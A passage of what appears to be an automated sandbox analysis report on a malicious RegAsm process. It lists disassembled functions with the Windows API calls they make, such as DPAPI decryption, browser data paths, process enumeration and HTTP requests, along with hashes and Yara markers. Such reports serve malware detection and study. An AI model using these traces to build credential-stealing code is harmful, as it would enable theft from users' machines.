                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                            • String ID: $DPAPI
                                                                            • API String ID: 2477620391-1819349886
                                                                            • Opcode ID: 7dfd3c404522f5fba9cfd470d0499fc11dcebd0c230a6c7a8048448d2f3d36ba
                                                                            • Instruction ID: 8b9103f373224ef9c7d1e1e34525f01fb5e997a78b4ac406efbcf79e04d5bcd8
                                                                            • Opcode Fuzzy Hash: 7dfd3c404522f5fba9cfd470d0499fc11dcebd0c230a6c7a8048448d2f3d36ba
                                                                            • Instruction Fuzzy Hash: 8B21A272D00109ABCF10ABE5CD42AEFBB79AF54314F14027BF901B11D2EA399A958699
                                                                            Function 0041064B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?), ref: 00410694
                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000), ref: 004106B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                            • String ID: Windows 11
                                                                            • API String ID: 3676486918-2517555085
                                                                            • Opcode ID: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                            • Instruction ID: 104df8f2525a0fd679668ea989e6de38b513391d3ca0bb797f84468fdfaa6df1
                                                                            • Opcode Fuzzy Hash: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                            • Instruction Fuzzy Hash: 19F06279640215FBEB209BD1DD0AFAA7A7EEB49B04F201075FB01E61A0D7B49A509B24
                                                                            Function 0040FB50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC), ref: 0040FB6B
                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
                                                                            • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                            • String ID: CurrentBuildNumber
                                                                            • API String ID: 3676486918-1022791448
                                                                            • Opcode ID: b9bf53c9aadd1465afb422ec0005ef8ef59a9f86fcd7e1a7c6fd75589dd59d58
                                                                            • Instruction ID: 38c23b2a009fde1c93731900e80abf8fdc92a9d8531a5489515771ffac6c83d0
                                                                            • Opcode Fuzzy Hash: b9bf53c9aadd1465afb422ec0005ef8ef59a9f86fcd7e1a7c6fd75589dd59d58
                                                                            • Instruction Fuzzy Hash: 20F03076240214FBFB109BD1DC0FFAE7A7EEB45B44F101069F701A50A0D7B569409B24
                                                                            Function 0040913E Relevance: 7.8, APIs: 5, Instructions: 274filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00409143
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425DB4,?,?,?,00425B9B,00000000), ref: 0040921D
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                            • String ID:
                                                                            • API String ID: 3423466546-0
                                                                            • Opcode ID: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                            • Instruction ID: 49701c4b31c8d318cf39a30ad3edccb9fb9ad7eb1a88c61520d5ae36ab01da66
                                                                            • Opcode Fuzzy Hash: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                            • Instruction Fuzzy Hash: 64B14A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                            Function 6CC4C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC4C947
                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CC4C969
                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC4C9A9
                                                                            • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CC4C9C8
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CC4C9E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocInfoSystem$Free
                                                                            • String ID:
                                                                            • API String ID: 4191843772-0
                                                                            • Opcode ID: cbc0b3ac0dd6c7632f84ec0c944eb9480f917d19491a2713eb1c4f9d20d1458c
                                                                            • Instruction ID: 60f21c85aeb019d5848d221ca7b1e7ce2efbc21e33a6eafe329d22d99e633b92
                                                                            • Opcode Fuzzy Hash: cbc0b3ac0dd6c7632f84ec0c944eb9480f917d19491a2713eb1c4f9d20d1458c
                                                                            • Instruction Fuzzy Hash: 8F21F935741614BBDB04AEB9DCD4BAE73B9BB46704F50852AF903A7B40FB705C048794
                                                                            Function 004102C3 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004102C8
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                            • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                            • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                            • String ID:
                                                                            • API String ID: 599723951-0
                                                                            • Opcode ID: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                            • Instruction ID: a4a97019f206722b2e8740589aebd7bc91867f573d1150960a86d602fc248a9b
                                                                            • Opcode Fuzzy Hash: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                            • Instruction Fuzzy Hash: 23210CB1A00118EBCB10EFA5CD55AEEBBB9AF58348F50407EE405F3691CB785A488B65
                                                                            Function 004024D7 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004024F0
                                                                              • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                              • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                              • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                            • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                              • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                            • memset.MSVCRT ref: 00402540
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                            • String ID:
                                                                            • API String ID: 3248666761-0
                                                                            • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                            • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                            • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                            • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                            Function 0040D6BB Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 454COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040D6C0
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00425BC6,00425BC3,?,?,?), ref: 0040D70A
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                              • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                            • String ID: #$Opera GX
                                                                            • API String ID: 2625060131-1046280356
                                                                            • Opcode ID: 0d52e54730dc141048d375f83ad8129c69a5083a6e3fd02f50115e121cba97ed
                                                                            • Instruction ID: 6c82463e2676cb38e72d52ba03d9db1ff071c52b99602dbfe09bc28b63ea1fae
                                                                            • Opcode Fuzzy Hash: 0d52e54730dc141048d375f83ad8129c69a5083a6e3fd02f50115e121cba97ed
                                                                            • Instruction Fuzzy Hash: 2A028C7190424CEADF14EBE5D956BDEBBB8AF19308F50417EE405732C2DA781B0C8B66
                                                                            Function 00413326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041332B
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologlstrlen
                                                                            • String ID: ERROR
                                                                            • API String ID: 2133942097-2861137601
                                                                            • Opcode ID: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                            • Instruction ID: 77545b96f9c55e0de6ec71263cb7e0cfa71b0ad252d2fb84a837ede919fdf13f
                                                                            • Opcode Fuzzy Hash: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                            • Instruction Fuzzy Hash: 133172B1900148AFCB00EFA9D956BDD7FB4AB15304F10803EF405A7282DB389648CBA9
                                                                            Function 0041303A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041303F
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                              • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                              • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                              • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                              • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                              • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                              • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                              • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                            • String ID: ERROR$ERROR
                                                                            • API String ID: 1120091252-2579291623
                                                                            • Opcode ID: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                            • Instruction ID: 9cf05e6fcab295474e65acada3454b7dde9d8d835f49f967da0029279a9dc82d
                                                                            • Opcode Fuzzy Hash: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                            • Instruction Fuzzy Hash: FC210EB0900189EADB14FFA5C556BDDBBF4AF18348F50417EE80563682DB785B0CCB66
                                                                            Function 00411001 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
